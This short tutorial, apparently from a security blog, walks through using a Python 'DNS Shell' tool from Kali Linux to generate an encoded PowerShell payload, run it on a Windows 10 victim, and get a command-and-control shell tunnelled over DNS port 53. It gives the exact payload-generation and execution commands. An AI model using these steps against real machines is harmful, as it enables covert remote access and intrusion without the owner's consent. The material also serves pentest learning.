DNS protocol runs on the application layer of the TCP/IP Model. When an attacker or pentester tries to exploit DNS with RCE vulnerability (Remote Command Execution) destination server acts as the backdoor.
DNS Shell Tool is a python based Exploitation tool to compromise and also maintaining the access via command and control to the server.
Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)
- Download the DNS SHELL tool HERE
- Execute the command: python DNS-SHELL.py
- It can be utilized with different modes, Recursive mode (It will run the DNS name) and Direct mode will run as Ip address provided (Kali Linux IP)
Generating Payload – DNS Shell
- Above Figure is Recursive mode.
- Recursive Command Executed: Python DNS-Shell.py -l -r <Domain Name>
NOTE: Command to be executed for direct mode: Python DNS-Shell.py -l -d
- Above figure shows recursive mode has generated payload.
- Run & Execute the Command with CMD: Powershell.exe -e <Copy and paste the Generated Payload HERE>
BACK TO ATTACKERS MACHINE
- Once the payload is executed in victims machine. Shell of Windows 10 machine is obtained.
- Above Figure shows destination (windows 10) now acts as backdoor and command is entered and turns to Convert Channel to over port 53 of DNS.Happy Hacking !!!